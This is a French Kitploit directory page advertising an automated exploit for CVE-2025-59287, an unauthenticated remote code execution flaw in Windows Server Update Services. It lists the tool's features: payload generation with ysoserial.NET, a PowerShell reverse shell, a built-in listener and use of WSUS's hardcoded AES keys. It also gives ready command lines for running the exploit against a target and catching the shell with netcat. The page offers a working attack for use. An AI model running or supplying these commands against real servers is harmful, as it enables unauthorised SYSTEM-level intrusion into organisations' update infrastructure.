Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59287 — Exploit automatisé pour CVE-2025-59287, une RCE non authentifiée dans WSUS, avec génération de payload, écouteur de shell inversé et chiffrement AES avec clés codées en dur. | Kitploit
Outils/GitHubGitHub/garvitv14/cve-2025-59287
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Exploit automatisé pour CVE-2025-59287, une RCE non authentifiée dans WSUS, avec génération de payload, écouteur de shell inversé et chiffrement AES avec clés codées en dur.

Voir le dépôt
162il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE CVE-2025-59287 WSUS

Exploit automatisé pour la vulnérabilité d'exécution de code à distance non authentifiée de Windows Server Update Services (WSUS).

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-59287
  • Score CVSS : 9,8 (Critique)
  • Vecteur d'attaque : Réseau
  • Authentification : Aucune requise
  • Impact : Exécution de code à distance en tant que SYSTEM

Fonctionnalités

✅ Génération de charge utile entièrement automatisée
✅ Téléchargement automatique de la dépendance ysoserial.NET
✅ Écouteur de shell inversé intégré
✅ Prise en charge multiplateforme (Windows/Linux/Mac)
✅ Chiffrement AES avec les clés codées en dur de WSUS
✅ Charge utile de shell inversé PowerShell

Prérequis

pip install -r requirements.txt

Dépendances Python

Runtime .NET (Détection automatique)

  • Windows : .NET Framework (intégré)
  • Linux/Mac : Wine ou Mono Ubuntu/Debian
  • sudo apt install wine-stable

    sudo apt install mono-complete

    Installation

    Clonez ou téléchargez les fichiers de l'exploit

    cd CVE-2025-59287-exploit

    Exécutez l'exploit (téléchargement automatique de ysoserial.NET)

    python3 exploit.py -u http://cible:8530 -lhost VOTRE_IP -lport 4444

    Utilisation

    Exploitation de base

    python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

    si vous souhaitez une session sur un autre écouteur

    Terminal 1 : Démarrez l'écouteur netcat

    nc -lvnp 4444

    Terminal 2 : Exécutez l'exploit sans écouteur intégré

    python3 exploit.py -u http://cible:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

    Télécharger l’outil